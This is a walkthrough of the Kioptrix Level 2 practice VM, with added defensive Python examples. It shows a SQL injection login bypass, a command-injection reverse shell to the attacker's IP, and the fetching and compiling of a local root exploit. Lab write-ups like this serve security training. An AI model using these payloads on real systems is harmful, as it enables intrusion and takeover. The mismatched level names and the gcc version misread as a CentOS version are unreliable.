Kioptrix Level 1.1 Walkthrough.
Before we begin, let's run netdiscover to find the IP address the VM has been given on our network.
If you have no clue on how to do this, go back to my Kioptrix Level 1 walkthrough.
In the terminal, type: nmap -A -p- -sS 192.168.1.84
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-03 11:48 PDT
Nmap scan report for 192.168.1.84
Host is up (0.00038s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            841/udp  status
|_  100024  1            844/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2019-07-03T15:39:29+00:00; -3h09m42s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
844/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:9A:CB:A7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -3h09m42s, deviation: 0s, median: -3h09m42s

TRACEROUTE
HOP RTT     ADDRESS
1   0.38 ms 192.168.1.84

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
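As an added example (not part of the original walkthrough), here is a small Python script that reads the nmap output above and flags the findings a defender would want to act on: SSHv1 and SSLv2 support, export-grade SSLv2 ciphers, the certificate that had already expired at scan time, and the risky PUT method on CUPS. The scan text embedded in it is a trimmed copy of the output above; the parser, the finding labels and the function name audit_nmap are my own.

```python
import re
from datetime import datetime

# Trimmed copy of the nmap output shown above (constructed sample for this example).
SCAN = """\
Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-03 11:48 PDT
Nmap scan report for 192.168.1.84
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
3306/tcp open  mysql    MySQL (unauthorized)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d{2}-\d{2})")
NOT_AFTER_RE = re.compile(r"Not valid after:\s*(\d{4}-\d{2}-\d{2})")


def audit_nmap(text):
    """Walk normal nmap output and return (port, finding) pairs worth fixing."""
    scan_date = None
    port = None
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = START_RE.match(line)
        if m:
            scan_date = datetime.strptime(m.group(1), "%Y-%m-%d")
            continue
        m = PORT_RE.match(line)
        if m:
            # Remember which open port the following NSE script lines belong to.
            port = f"{m.group(1)}/{m.group(2)}"
            continue
        if not line.startswith("|"):
            continue
        body = line.lstrip("|_ ")  # drop the script-output prefix
        if "Server supports SSHv1" in body:
            findings.append((port, "SSHv1 enabled"))
        elif body == "SSLv2 supported":
            findings.append((port, "SSLv2 enabled"))
        elif body.startswith("Potentially risky methods:"):
            findings.append((port, "risky HTTP methods: " + body.split(":", 1)[1].strip()))
        elif body.startswith("SSL2_") and "EXPORT" in body:
            findings.append((port, "export-grade cipher: " + body))
        else:
            m = NOT_AFTER_RE.search(body)
            if m and scan_date:
                expiry = datetime.strptime(m.group(1), "%Y-%m-%d")
                if expiry < scan_date:
                    findings.append((port, f"certificate expired {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for port, finding in audit_nmap(SCAN):
        print(f"{port:9} {finding}")
```

Run against the full scan above it reports five items on 22/tcp, 443/tcp and 631/tcp; every one of them is a legacy protocol or configuration that should simply be switched off or replaced on a host this old.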
After this recon, I can see that ports 80 and 443 are open, so the web server is the first thing to probe.
At the login screen, I attempt an SQL injection authentication bypass.
The username I have tried to use for SQL injection bypass is:
admin
The password or SQL query string, which I have inputted for this to basically bypass the authentication is this:
' or 1=1 --
It worked and, voilà, I am in the web portal.
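To show why ' or 1=1 -- gets past the login, here is an added Python example (not the Kioptrix application's code) that creates an in-memory SQLite table with a constructed admin account and compares a login query assembled by string concatenation with a parameterised one. The table layout, the password "correct horse" and the function names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Constructed sample: one admin account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext here only so the example stays focused on the query itself;
    # a real application stores a salted password hash.
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Query built by string concatenation, the pattern behind the bypass above."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    # With password = "' or 1=1 --" the statement becomes
    #   ... WHERE username='admin' AND password='' or 1=1 --'
    # "or 1=1" makes the WHERE clause true for every row and "--" comments
    # out the dangling quote, so a row comes back without a valid password.
    return db.execute(sql).fetchone() is not None


def login_safe(db, username, password):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1 --"
    print("vulnerable login with payload:", login_vulnerable(db, "admin", payload))   # True
    print("safe login with payload:      ", login_safe(db, "admin", payload))         # False
    print("safe login with real password:", login_safe(db, "admin", "correct horse"))  # True
```

The only difference between the two functions is that the second hands the credentials to the driver as bound parameters, which is the fix for the whole class of bug, not just for this one payload.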
I will now ping localhost and append a ; so that a second command follows it.
This will validate whether I have command execution (injection) on the server.
The next step is to use command injection in the same textbox to pop a reverse shell.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.76 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::5705:19af:d9b2:5323 prefixlen 64 scopeid 0x20<link>
inet6 2001:569:79a3:1400:8454:1c30:47e9:843d prefixlen 64 scopeid 0x0<global>
First, get your own IP address by running ifconfig (192.168.1.76 above).
Then, in the ping textbox, type: localhost; bash -i >& /dev/tcp/192.168.1.76/1234 0>&1
This opens a basic reverse shell, connecting the victim's machine back to yours.
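Added example, not the Kioptrix page's own code: a Python sketch of the ping feature in the shape the page exploits (user text glued onto a shell command line), next to a hardened version that validates the target and passes an argv list to subprocess with no shell, so a trailing ; never reaches a shell. The function names and the hostname pattern are my own assumptions.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and inner hyphens, joined by dots.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_command_vulnerable(target):
    """Shape of the injectable form: user text glued into a shell command line."""
    # Given to a shell (e.g. os.system), "localhost; uname -a" runs uname as well.
    return "ping -c 1 " + target


def validate_target(target):
    """Accept only an IP address literal or a plain hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(target) is not None


def ping_command_safe(target):
    """Hardened: validate, then build an argv list so no shell ever sees the input."""
    if not validate_target(target):
        raise ValueError("invalid ping target")
    # Each element is one argument; ';', '&', '>' and friends are just bytes here.
    return ["ping", "-c", "1", target]


def run_ping(target, timeout=5):
    """Run the hardened command without a shell; returns (exit code, stdout)."""
    proc = subprocess.run(ping_command_safe(target), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode, proc.stdout


if __name__ == "__main__":
    injected = "localhost; uname -a"
    print(ping_command_vulnerable(injected))   # a shell would run both commands
    try:
        ping_command_safe(injected)
    except ValueError as e:
        print("rejected:", e)
    print(ping_command_safe("127.0.0.1"))
```

Validation alone is not the fix; the argv list without shell=True is what makes the metacharacters harmless, and the allow-list on top keeps ping from being handed option-looking strings.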
And, then I am in.
Now I want to do some recon on the victim's machine.
First, I check whether the machine is a Red Hat derivative:
bash-3.00$ cat /etc/redhat-release
CentOS release 4.5 (Final)
I now know the release: CentOS 4.5, a Red Hat derivative.
Next, uname -a reveals the kernel version.
bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux
I also check /proc/version for the kernel build and compiler details:
bash-3.00$ cat /proc/version
Linux version 2.6.9-55.EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007
There might be a local privilege escalation vulnerability for CentOS in version 3.4.6-8.
Let's do a searchsploit for CentOS 4.5 to see if we can pick up anything.
Now copy the exploit into your current directory:
cp /usr/share/exploitdb/exploits/linux/local/9542.c .
Then compile the C file:
gcc 9542.c -o privyEscalate
Then start a Python HTTP server in that directory to host the exploit:
python -m SimpleHTTPServer
Now, on the victim machine, fetch the file from LHOST:8000/9542.c (LHOST is your attacker IP).
Compile the C code on the victim machine itself. Usually /tmp is the only writable folder on a victim machine; the other directories are read-only for your user.
Voilà, I have rooted Kioptrix 1.2.